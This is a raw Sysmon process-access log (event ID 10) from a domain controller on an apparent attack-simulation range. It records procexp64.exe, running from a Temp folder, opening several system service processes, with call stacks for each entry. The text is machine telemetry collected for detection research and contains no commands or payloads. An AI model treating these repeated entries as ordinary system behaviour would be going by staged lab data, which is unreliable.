15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791086Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791085Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791084Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791083Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791082Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791081Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791080Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791079Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791078Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791077Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791076Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791075Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791074Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791073Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791072Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791071Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791070Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.595{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\n